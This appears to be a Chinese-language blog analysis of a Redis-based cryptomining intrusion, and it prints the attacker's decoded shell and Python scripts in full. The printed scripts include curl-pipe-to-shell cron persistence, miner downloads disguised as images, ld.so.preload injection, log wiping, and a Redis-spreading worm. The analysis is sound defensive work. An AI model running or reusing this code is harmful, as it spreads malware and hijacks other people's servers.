起因
这被入侵的机子,就是没有设密码的Redis,被搞了一波。
跟踪记录流水账
阿里云这截图的给出的命令行参数
/bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
直接看看这个链接的内容
1jane@debian:~$ curl https://pastebin.com/raw/xbY7p5Tb
2/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash
继续跟踪链接
1curl https://pastebin.com/raw/uuYVPLXd
2
3省略一堆被base64加密的内容
4
5解密一下
6
7curl https://pastebin.com/raw/uuYVPLXd | base64 -d
8
9#!/bin/bash
10SHELL=/bin/sh
11PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
12
13function kills() {
14 pkill -f sourplum
15 pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
16
17
18 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
19 rm -rf /tmp/*index_bak*
20 rm -rf /tmp/*httpd.conf*
21 rm -rf /tmp/*httpd.conf
22 rm -rf /tmp/a7b104c270
23
24
25 ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill -9
26 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs kill -9
27 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs kill -9
28 ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs kill -9
29 ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs kill -9
30 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs kill -9
31 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs kill -9
32 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs kill -9
33 ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs kill -9
34 ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs kill -9
35 ps auxf | grep -v grep | grep "xmrig" | awk '{print $2}' | xargs kill -9
36 ps auxf | grep -v grep | grep "xmrigDaemon" | awk '{print $2}' | xargs kill -9
37 ps auxf | grep -v grep | grep "xmrigMiner" | awk '{print $2}' | xargs kill -9
38
39
40
41 pkill -f biosetjenkins
42 pkill -f AnXqV.yam
43 pkill -f xmrigDaemon
44 pkill -f xmrigMiner
45 pkill -f xmrig
46 pkill -f Loopback
47 pkill -f apaceha
48 pkill -f cryptonight
49 pkill -f stratum
50 pkill -f mixnerdx
51 pkill -f performedl
52 pkill -f JnKihGjn
53 pkill -f irqba2anc1
54 pkill -f irqba5xnc1
55 pkill -f irqbnc1
56 pkill -f ir29xc1
57 pkill -f conns
58 pkill -f irqbalance
59 pkill -f crypto-pool
60 pkill -f minexmr
61 pkill -f XJnRj
62 pkill -f NXLAi
63 pkill -f BI5zj
64 pkill -f askdljlqw
65 pkill -f minerd
66 pkill -f minergate
67 pkill -f Guard.sh
68 pkill -f ysaydh
69 pkill -f bonns
70 pkill -f donns
71 pkill -f kxjd
72 pkill -f Duck.sh
73 pkill -f bonn.sh
74 pkill -f conn.sh
75 pkill -f kworker34
76 pkill -f kw.sh
77 pkill -f pro.sh
78 pkill -f polkitd
79 pkill -f acpid
80 pkill -f icb5o
81 pkill -f nopxi
82 pkill -f irqbalanc1
83 pkill -f minerd
84 pkill -f i586
85 pkill -f gddr
86 pkill -f mstxmr
87 pkill -f ddg.2011
88 pkill -f wnTKYg
89 pkill -f deamon
90 pkill -f disk_genius
91 pkill -f sourplum
92 pkill -f bashx
93 pkill -f bashg
94 pkill -f bashe
95 pkill -f bashf
96 pkill -f bashh
97 pkill -f XbashY
98 pkill -f libapache
99
100
101
102 rm -rf /tmp/httpd.conf
103 rm -rf /tmp/conn
104 rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
105 rm -rf /tmp/conns
106 rm -f /tmp/irq.sh
107 rm -f /tmp/irqbalanc1
108 rm -f /tmp/irq
109 rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
110
111
112 netstat -anp | grep 69.28.55.86:443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
113 netstat -anp | grep 3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
114 netstat -anp | grep 4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
115 netstat -anp | grep 5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
116 netstat -anp | grep 6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
117 netstat -anp | grep 7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
118 netstat -anp | grep 3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
119 netstat -anp | grep 14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
120 netstat -anp | grep 5.196.225.222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
121
122
123
124 y=$(ps aux | grep -v grep | grep kworkerds | wc -l)
125
126 if [ ${y} -eq 0 ]; then
127 netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
128 fi
129
130
131
132}
133
134function system() {
135 if [ ! -f "/bin/httpdns" ]; then
136 curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
137 if [ ! -f "/bin/httpdns" ]; then
138 wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
139 fi
140 sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
141 fi
142
143}
144
145function top() {
146 if [ ! -f "/usr/local/lib/libntp.so" ]; then
147 curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
148 if [ ! -f "/usr/local/lib/libntp.so" ]; then
149 wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
150 fi
151 fi
152 if [ ! -f "/etc/ld.so.preload" ]; then
153 echo /usr/local/lib/libntp.so >/etc/ld.so.preload
154 else
155 sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >>/etc/ld.so.preload
156 fi
157
158
159 touch -acmr /bin/sh /etc/ld.so.preload
160 touch -acmr /bin/sh /usr/local/lib/libjdk.so
161 touch -acmr /bin/sh /usr/local/lib/libntp.so
162
163
164 echo 0>/var/spool/mail/root #发邮件
165 echo 0>/var/log/wtmp #登陆记录
166 echo 0>/var/log/secure #身份权鉴别记录
167 echo 0>/var/log/cron #cron消息记录
168}
169
170function python() {
171 nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
172 touch /tmp/.tmpa
173}
174
175function echocron() {
176 echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
177 echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
178 mkdir -p /var/spool/cron/crontabs
179 echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
180
181 touch -acmr /bin/sh /etc/cron.d/root
182 touch -acmr /bin/sh /var/spool/cron/crontabs
183 touch -acmr /bin/sh /var/spool/cron/root
184 touch -acmr /bin/sh /var/spool/cron/crontabs/root
185
186}
187
188function downloadrun() {
189 ps=$(netstat -anp | grep 13531 | wc -l)
190 if [ ${ps} -eq 0 ]; then
191 if [ ! -f "/tmp/kworkerds" ]; then
192 curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
193 if [ ! -f "/tmp/kworkerds" ]; then
194 wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
195 fi
196 nohup /tmp/kworkerds >/dev/null 2>&1 &
197 else
198 nohup /tmp/kworkerds >/dev/null 2>&1 &
199 fi
200 fi
201}
202
203function downloadrunxm() {
204 pm=$(netstat -anp | grep 13531 | wc -l)
205 if [ ${pm} -eq 0 ]; then
206 if [ ! -f "/bin/config.json" ]; then
207 curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
208 if [ ! -f "/bin/config.json" ]; then
209 wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
210 fi
211 fi
212 if [ ! -f "/bin/kworkerds" ]; then
213 curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
214 if [ ! -f "/bin/kworkerds" ]; then
215 wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
216 fi
217 nohup /bin/kworkerds >/dev/null 2>&1 &
218 else
219 nohup /bin/kworkerds >/dev/null 2>&1 &
220 fi
221 fi
222}
223
224update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
225
226if [ ${update}x = "update"x ]; then
227 rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
228 echocron
229else
230 if [ ! -f "/tmp/.tmpa" ]; then
231 rm -rf /tmp/.tmp
232 python
233 fi
234 kills
235 downloadrun
236 echocron
237 system
238 top
239 sleep 10
240 port=$(netstat -anp | grep 13531 | wc -l)
241 if [ ${port} -eq 0 ]; then
242 downloadrunxm
243 fi
244fi
245#
246#�
function有点多,用Atom折叠下。
1update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
2
3if [ ${update}x = "update"x ]; then
4 rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
5 echocron
6else
7 .
8 .
9 .
10fi
脚本执行的第一步就是根据update返回值确定是不是要更新。
现在我这个时间点去访问,是noupdate。
1curl https://pastebin.com/raw/C4ZhQFrH
2
3noupdate
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
用脚都能够猜得出这些文件有问题,挖矿脚本需要更新的东西还能是啥子。
看看这个echocron的function干了啥
1function echocron() {
2 echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
3 echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
4 mkdir -p /var/spool/cron/crontabs
5 echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
6
7 touch -acmr /bin/sh /etc/cron.d/root
8 touch -acmr /bin/sh /var/spool/cron/crontabs
9 touch -acmr /bin/sh /var/spool/cron/root
10 touch -acmr /bin/sh /var/spool/cron/crontabs/root
11
12}
13
这个意图就非常之明显啦,添加定时任务到系统里面,让这挖矿生生不息。
留意一下,这个获取脚本的地址,恰好不就是现在分析的这个脚本咩。
1/etc/cron.d/root
2/var/spool/cron/root
3/var/spool/cron/crontabs
4/var/spool/cron/crontabs/root
上面的文件还使用touch -acmr改掉了时间,改成跟sh一个时间,怕是防止运维用find找出来吧。
1if [ ! -f "/tmp/.tmpa" ]; then
2 rm -rf /tmp/.tmp
3 python
4fi
判断有没有/tmp/.tmpa,没有就删掉/tmp/.tmp,再调用python这个function。
怀疑.tmp对于apache有较大影响。
1function python() {
2 nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
3 touch /tmp/.tmpa
4}
这个/tmp/.tmpa,应该就是判定有没有运行过这个python脚本的了。
现在看看这个python脚本运行的是啥子
先来个base64解密
1#coding: utf-8
2import urllib
3import base64
4
5d= 'https://pastebin.com/raw/nYBpuAxT'
6try:
7 page=base64.b64decode(urllib.urlopen(d).read())
8 exec(page)
9except:
10 pass
1curl https://pastebin.com/raw/nYBpuAxT | base64 -d
实际上他要运行的脚本就是这个
1#! /usr/bin/env python
2#coding: utf-8
3
4import threading
5import socket
6from re import findall
7import httplib
8
9IP_LIST = []
10
11class scanner(threading.Thread):
12 tlist = []
13 maxthreads = 100
14 evnt = threading.Event()
15 lck = threading.Lock()
16
17 def __init__(self,host):
18 threading.Thread.__init__(self)
19 self.host = host
20 def run(self):
21 try:
22 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 s.settimeout(5)
24 s.connect((self.host, 6379))
25 s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
26 s.send('config set dir /etc/cron.d\r\n')
27 s.send('config set dbfilename root\r\n')
28 s.send('save\r\n')
29 s.close()
30 except Exception:
31 pass
32 scanner.lck.acquire()
33 scanner.tlist.remove(self)
34 if len(scanner.tlist) < scanner.maxthreads:
35 scanner.evnt.set()
36 scanner.evnt.clear()
37 scanner.lck.release()
38
39 def newthread(host):
40 scanner.lck.acquire()
41 sc = scanner(host)
42 scanner.tlist.append(sc)
43 scanner.lck.release()
44 sc.start()
45
46 newthread = staticmethod(newthread)
47
48def get_ip_list():
49 try:
50 url = 'ident.me'
51 conn = httplib.HTTPConnection(url, port=80, timeout=10)
52 req = conn.request(method='GET', url='/', )
53 result = conn.getresponse()
54 ip2 = result.read()
55 ips2 = findall(r'\d+.\d+.', ip2)[0]
56 for i in range(0, 255):
57 ip_list1 = (ips2 + (str(i)))
58 for g in range(0, 255):
59 IP_LIST.append(ip_list1 + '.' + (str(g)))
60 except Exception:
61 pass
62
63def runPortscan():
64 get_ip_list()
65 for host in IP_LIST:
66 scanner.lck.acquire()
67 if len(scanner.tlist) >= scanner.maxthreads:
68 scanner.lck.release()
69 scanner.evnt.wait()
70 else:
71 scanner.lck.release()
72 scanner.newthread(host)
73 for t in scanner.tlist:
74 t.join()
75
76if __name__ == "__main__":
77 runPortscan()
78
粗略地看了两下,就是一个扫Redis默认端口并且传播挖矿脚本的操作。
这被入侵的机子,就是没有设密码的Redis,被搞了一波。
1s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
2s.settimeout(5)
3s.connect((self.host, 6379))
4s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
5s.send('config set dir /etc/cron.d\r\n')
6s.send('config set dbfilename root\r\n')
7s.send('save\r\n')
8s.close()
1url = 'ident.me'
2conn = httplib.HTTPConnection(url, port=80, timeout=10)
3req = conn.request(method='GET', url='/', )
4result = conn.getresponse()
5ip2 = result.read()
6ips2 = findall(r'\d+.\d+.', ip2)[0]
7for i in range(0, 255):
8 ip_list1 = (ips2 + (str(i)))
9 for g in range(0, 255):
10 IP_LIST.append(ip_list1 + '.' + (str(g)))
继续往下看
1kills
2downloadrun
3echocron
4system
5top
6sleep 10
7port=$(netstat -anp | grep 13531 | wc -l)
8if [ ${port} -eq 0 ]; then
9 downloadrunxm
10fi
看看这个kills的function干了啥
开始的两行就很interesting了,先把同行的挖矿给干了。
1pkill -f sourplum
2pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
第一行是干掉sourplum。
第二行是干掉wnTKYg,ddg这个是帮他死掉后重启的。
1rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
2rm -rf /tmp/*index_bak*
3rm -rf /tmp/*httpd.conf*
4rm -rf /tmp/*httpd.conf
5rm -rf /tmp/a7b104c270
不清楚第一行的删除有什么用,但是涉及到/boot的东西,估计都蛋疼。
后几行都是删掉了apache的备份。
最后一行,a7b104c270,这个是挖矿的。
整个kill的function看下来,都是针对于apache和挖矿恶意程序。
跟这次比较相关就下面这些
1rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
2
3y=$(ps aux | grep -v grep | grep kworkerds | wc -l)
4
5if [ ${y} -eq 0 ]; then
6 netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
7fi
从这几行基本可以判定,kworkerds这就是他的挖矿程序。
要是13531这个端口被占用,又不是这个kworkerds,就kill掉,腾出来给他挖矿用。
把后面遇到的config.json拿到这里来,就很清晰了。
1"url": "stratum+tcp://xmr.f2pool.com:13531",
看看这个downloadrun的function干了啥
1function downloadrun() {
2 ps=$(netstat -anp | grep 13531 | wc -l)
3 if [ ${ps} -eq 0 ]; then
4 if [ ! -f "/tmp/kworkerds" ]; then
5 curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
6 if [ ! -f "/tmp/kworkerds" ]; then
7 wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
8 fi
9 nohup /tmp/kworkerds >/dev/null 2>&1 &
10 else
11 nohup /tmp/kworkerds >/dev/null 2>&1 &
12 fi
13 fi
14}
thyrsi.com,一个图床站。
这里稍微做了下伪装。
把kworkerds下到/tmp,并且运行。
这个下载链接在国内速度真是好差,这可能就是为啥在这次入侵的机子上面找不到这个程序的问题emmm。
但是在海外下载是没有问题的。
1root@659b8ee8ecf6:/# chmod 777 kworkerds
2root@659b8ee8ecf6:/# ./kworkerds
3[2018-09-03 18:31:58] : Autoconf L3 size detected at 3072 KB.
4[2018-09-03 18:31:58] : Autoconf core count detected as 2 on Linux.
5[2018-09-03 18:31:58] : Starting 1x thread, affinity: 0.
6[2018-09-03 18:31:58] : Starting 1x thread, affinity: 1.
7[2018-09-03 18:31:59] : Dev pool connected. Logging in...
8[2018-09-03 18:32:01] : Pool logged in.
在容器上面跑了一下,确实的一个挖矿的程序。CPU一下子就上天了。
1docker diff debian
2
3C /tmp
4A /tmp/.systemd-private-23024397a2adb34112feb510f90ad653.service-3vFbca
5A /tmp/.systemd-private-45a30b14252fad11672e49bbbda5c08f.service-5qFboa
6A /tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa
7A /kworkerds
在输出的文件里面/tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa
1"pool_list" :
2[
3 {"pool_address" : "xmr.f2pool.com:13531",
4 "wallet_address" : "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.bashx",
5 "rig_id" : "",
6 "pool_password" : "",
7 "use_nicehash" : false,
8 "use_tls" : false,
9 "tls_fingerprint" : "",
10 "pool_weight" : 1
11 },
12],
这个应该是一个已经封装好挖矿程序(挖矿的地址和矿池都写好了),开箱即用。2333
哪怕没有下载后面的config.json都能够跑。
看看这个system的function干了啥
1function system() {
2 if [ ! -f "/bin/httpdns" ]; then
3 curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
4 if [ ! -f "/bin/httpdns" ]; then
5 wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
6 fi
7 sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
8 fi
9
10}
先看看这个链接是啥玩儿
1curl https://pastebin.com/raw/698D7kZU
2
3/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash
4
又需要你再获取再解码,他不烦吗?
最后得到下面的内容
1#!/bin/sh
2SHELL=/bin/sh
3PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
4
5function downloadrun() {
6 ps=$(netstat -anp | grep 13531 | wc -l)
7 if [ ${ps} -eq 0 ]; then
8 if [ ! -f "/tmp/kworkerds" ]; then
9 curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
10 if [ ! -f "/tmp/kworkerds" ]; then
11 wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
12 fi
13 nohup /tmp/kworkerds >/dev/null 2>&1 &
14 else
15 nohup /tmp/kworkerds >/dev/null 2>&1 &
16 fi
17 fi
18}
19
20function downloadrunxm() {
21 pm=$(netstat -anp | grep 13531 | wc -l)
22 if [ ${pm} -eq 0 ]; then
23 if [ ! -f "/bin/config.json" ]; then
24 curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
25 if [ ! -f "/bin/config.json" ]; then
26 wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
27 fi
28 fi
29 if [ ! -f "/bin/kworkerds" ]; then
30 curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
31 if [ ! -f "/bin/kworkerds" ]; then
32 wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
33 fi
34 nohup /bin/kworkerds >/dev/null 2>&1 &
35 else
36 nohup /bin/kworkerds >/dev/null 2>&1 &
37 fi
38 fi
39}
40
41function init() {
42 if [ ! -f "/usr/sbin/kworker" ]; then
43 curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
44 if [ ! -f "/usr/sbin/kworker" ]; then
45 wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
46 fi
47 fi
48 if [ ! -f "/etc/init.d/kworker" ]; then
49 curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
50 if [ ! -f "/etc/init.d/kworker" ]; then
51 wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
52 fi
53 fi
54 chkconfig --add kworker
55}
56
57function echocron() {
58 echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
59 echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
60 mkdir -p /var/spool/cron/crontabs
61 echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
62}
63
64update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
65if [ ${update}x = "update"x ]; then
66 rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
67 echocron
68else
69 downloadrun
70 init
71 echocron
72 sleep 10
73 port=$(netstat -anp | grep 13531 | wc -l)
74 if [ ${port} -eq 0 ]; then
75 downloadrunxm
76 fi
77fi
78#
79#�
这脚本不得不说,真的有毒。
用sh作为解析器,写函数的时候,前面还加function。
重命名成httpdns丢到bin目录,还给了执行权限。
在crontab里面增加了定时任务。